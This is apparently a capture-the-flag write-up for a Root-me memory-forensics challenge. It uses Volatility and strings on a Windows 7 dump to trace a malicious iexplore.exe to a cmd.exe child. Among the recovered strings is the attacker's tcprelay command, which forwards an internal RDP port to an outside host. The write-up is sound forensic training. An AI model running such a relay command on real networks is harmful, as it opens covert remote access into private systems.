Root-me.org

Command & Control - Level 4

Malware Analysis

We now know that iexplore.exe is the malware. So now need to figure out what’s the ip of the internal server used by the hackers.

So let’s go back to the process list

 vol.py --profile=Win7SP1x86 -f ch2.dmp pslist 
Volatility Foundation Volatility Framework 2.6
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x87978b78 System                    4      0    103     3257 ------      0 2013-01-12 16:38:09 UTC+0000                                 
0x88c3ed40 smss.exe                308      4      2       29 ------      0 2013-01-12 16:38:09 UTC+0000                                 
0x8929fd40 csrss.exe               404    396      9      469      0      0 2013-01-12 16:38:14 UTC+0000                                 
0x892ac2b8 wininit.exe             456    396      3       77      0      0 2013-01-12 16:38:14 UTC+0000                                 
0x88d03a00 csrss.exe               468    448     10      471      1      0 2013-01-12 16:38:14 UTC+0000                                 
0x892ced40 winlogon.exe            500    448      3      111      1      0 2013-01-12 16:38:14 UTC+0000                                 
0x896294c0 services.exe            560    456      6      205      0      0 2013-01-12 16:38:16 UTC+0000                                 
0x896427b8 lsass.exe               576    456      6      566      0      0 2013-01-12 16:38:16 UTC+0000                                 
0x8962f7e8 lsm.exe                 584    456     10      142      0      0 2013-01-12 16:38:16 UTC+0000                                 
0x8962f030 svchost.exe             692    560     10      353      0      0 2013-01-12 16:38:21 UTC+0000                                 
0x897b5c20 svchost.exe             764    560      7      263      0      0 2013-01-12 16:38:23 UTC+0000                                 
0x89805420 svchost.exe             832    560     19      435      0      0 2013-01-12 16:38:23 UTC+0000                                 
0x89852918 svchost.exe             904    560     17      409      0      0 2013-01-12 16:38:24 UTC+0000                                 
0x8986b030 svchost.exe             928    560     26      869      0      0 2013-01-12 16:38:24 UTC+0000                                 
0x898911a8 svchost.exe            1084    560     10      257      0      0 2013-01-12 16:38:26 UTC+0000                                 
0x898b2790 svchost.exe            1172    560     15      475      0      0 2013-01-12 16:38:27 UTC+0000                                 
0x898a7868 AvastSvc.exe           1220    560     66     1180      0      0 2013-01-12 16:38:28 UTC+0000                                 
0x8a0f9c40 spoolsv.exe            1712    560     14      338      0      0 2013-01-12 16:38:58 UTC+0000                                 
0x8a102748 svchost.exe            1748    560     18      310      0      0 2013-01-12 16:38:58 UTC+0000                                 
0x88cded40 sppsvc.exe             1872    560      4      143      0      0 2013-01-12 16:39:02 UTC+0000                                 
0x8a1d84e0 vmtoolsd.exe           1968    560      6      220      0      0 2013-01-12 16:39:14 UTC+0000                                 
0x9541c7e0 wlms.exe                336    560      4       45      0      0 2013-01-12 16:39:21 UTC+0000                                 
0x8a1f5030 VMUpgradeHelpe          448    560      4       89      0      0 2013-01-12 16:39:21 UTC+0000                                 
0x9542a030 TPAutoConnSvc.         1612    560      9      135      0      0 2013-01-12 16:39:23 UTC+0000                                 
0x87ac0620 taskhost.exe           2352    560      8      149      1      0 2013-01-12 16:40:24 UTC+0000                                 
0x87ad44d0 dwm.exe                2496    904      5       77      1      0 2013-01-12 16:40:25 UTC+0000                                 
0x87ac6030 explorer.exe           2548   2484     24      766      1      0 2013-01-12 16:40:27 UTC+0000                                 
0x87ae2880 TPAutoConnect.         2568   1612      5      146      1      0 2013-01-12 16:40:28 UTC+0000                                 
0x87a9c288 conhost.exe            2600    468      1       35      1      0 2013-01-12 16:40:28 UTC+0000                                 
0x87b82438 VMwareTray.exe         2660   2548      5       80      1      0 2013-01-12 16:40:29 UTC+0000                                 
0x87aa9220 VMwareUser.exe         2676   2548      8      190      1      0 2013-01-12 16:40:30 UTC+0000                                 
0x87b784b0 AvastUI.exe            2720   2548     14      220      1      0 2013-01-12 16:40:31 UTC+0000                                 
0x898fe8c0 StikyNot.exe           2744   2548      8      135      1      0 2013-01-12 16:40:32 UTC+0000                                 
0x87b6b030 iexplore.exe           2772   2548      2       74      1      0 2013-01-12 16:40:34 UTC+0000                                 
0x898fbb18 SearchIndexer.         2900    560     13      636      0      0 2013-01-12 16:40:38 UTC+0000                                 
0x87bd35b8 wmpnetwk.exe           3176    560      9      240      0      0 2013-01-12 16:40:48 UTC+0000                                 
0x89f3d2c0 svchost.exe            3352    560      9      141      0      0 2013-01-12 16:40:58 UTC+0000                                 
0x87c6a2a0 swriter.exe            3452   2548      1       19      1      0 2013-01-12 16:41:01 UTC+0000                                 
0x87ba4030 soffice.exe            3512   3452      1       28      1      0 2013-01-12 16:41:03 UTC+0000                                 
0x95483d18 soffice.bin            3556   3544      0 --------      1      0 2013-01-12 16:41:05 UTC+0000   2013-01-12 16:41:39 UTC+0000  
0x87b8ca58 soffice.bin            3564   3512     12      400      1      0 2013-01-12 16:41:05 UTC+0000                                 
0x89f1d3e8 svchost.exe            3624    560     14      348      0      0 2013-01-12 16:41:22 UTC+0000                                 
0x95495c18 taskmgr.exe            1232   2548      6      116      1      0 2013-01-12 16:42:29 UTC+0000                                 
0x87bf7030 cmd.exe                3152   2548      1       23      1      0 2013-01-12 16:44:50 UTC+0000                                 
0x87c595b0 conhost.exe            3228    468      2       54      1      0 2013-01-12 16:44:50 UTC+0000                                 
0x89898030 cmd.exe                1616   2772      2      101      1      0 2013-01-12 16:55:49 UTC+0000                                 
0x954826b0 conhost.exe            2168    468      2       49      1      0 2013-01-12 16:55:50 UTC+0000                                 
0x9549f678 iexplore.exe           1136   2548     18      454      1      0 2013-01-12 16:57:44 UTC+0000                                 
0x87d4d338 iexplore.exe           3044   1136     37      937      1      0 2013-01-12 16:57:46 UTC+0000                                 
0x87c90d40 audiodg.exe            1720    832      5      117      0      0 2013-01-12 16:58:11 UTC+0000                                 
0x87cbfd40 winpmem-1.3.1.         3144   3152      1       23      1      0 2013-01-12 16:59:17 UTC+0000                                 

We got 3 iexplore processes.

vol.py --profile=Win7SP1x86 -f ch2.dmp pslist |  grep iexplore
Volatility Foundation Volatility Framework 2.6
0x87b6b030 iexplore.exe           2772   2548      2       74      1      0 2013-01-12 16:40:34 UTC+0000                                 
0x9549f678 iexplore.exe           1136   2548     18      454      1      0 2013-01-12 16:57:44 UTC+0000                                 
0x87d4d338 iexplore.exe           3044   1136     37      937      1      0 2013-01-12 16:57:46 UTC+0000                                 

We can start by looking if any of the explore is the parent of other processes.

vol.py --profile=Win7SP1x86 -f ch2.dmp pslist |  grep -e "3044" -e "2772" -e "1136"
Volatility Foundation Volatility Framework 2.6
0x87b6b030 iexplore.exe           2772   2548      2       74      1      0 2013-01-12 16:40:34 UTC+0000                                 
0x89898030 cmd.exe                1616   2772      2      101      1      0 2013-01-12 16:55:49 UTC+0000                                 
0x9549f678 iexplore.exe           1136   2548     18      454      1      0 2013-01-12 16:57:44 UTC+0000                                 
0x87d4d338 iexplore.exe           3044   1136     37      937      1      0 2013-01-12 16:57:46 UTC+0000                                 

There’s a cmd.exe that has 2772 as a parent.

Let’s run the cmdscan to see all the commands ran.

Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 3228
CommandHistory: 0x2ff638 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 5 LastAdded: 4 LastDisplayed: 4
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
Cmd #0 @ 0x2fcd58: cd %temp%
Cmd #1 @ 0x2fd348: dir
Cmd #2 @ 0x2e1038: cd imagedump
Cmd #3 @ 0x2fd378: dir
Cmd #4 @ 0x304870: winpmem-1.3.1.exe ram.dmp
Cmd #12 @ 0x2d0038: 0?0^B
Cmd #36 @ 0x2d00c4: /?0?-???-
Cmd #37 @ 0x2fc1a8: 0?-???????/^A
**************************************************
CommandProcess: conhost.exe Pid: 3228
CommandHistory: 0x3007a8 Application: winpmem-1.3.1.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x90
**************************************************
CommandProcess: conhost.exe Pid: 2168
CommandHistory: 0x427700 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
Cmd #6 @ 0x350039: ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????h??????????????^A???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????^A???????????????????????????????????????????????????????????????^A???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????^A
Cmd #16 @ 0x330035: ?
Cmd #36 @ 0x4000c4: A?B?@???@
Cmd #37 @ 0x4140f0: B?@????
(END)

There’s nothing interesting here. There’s another command that allows us to see every all the input and output of the commands. The command being consoles

...
ConsoleProcess: conhost.exe Pid: 2168
Console: 0x1081c0 CommandHistorySize: 50
HistoryBufferCount: 3 HistoryBufferMax: 4
OriginalTitle: %SystemRoot%\system32\cmd.exe
Title: C:\Windows\system32\cmd.exe
AttachedProcess: cmd.exe Pid: 1616 Handle: 0x64
----
CommandHistory: 0x427a60 Application: tcprelay.exe Flags: 
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x427890 Application: whoami.exe Flags: 
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x427700 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64

There’s a tcprelay.exe application that got executed. The PID being 1616, exactly the same PID as we saw before.

We’ll run a strings and see where the word tcprelay can be found.

strings ch2.dmp | grep tcprelay
  tcprelay.exe
  tcprelay.exe
  tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
tcprelay.c
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
  tcprelay.exe
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
tcprelay.c
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
01/12/2013  05:57 PM            22,078 tcprelay.exe
mp\TEMP23\tcprelay.exe
 Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
01/12/2013  05:57 PM            22,078 tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ"
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ"
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
tcprelay.c
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443 

I think we got it. Internal server using RDP port.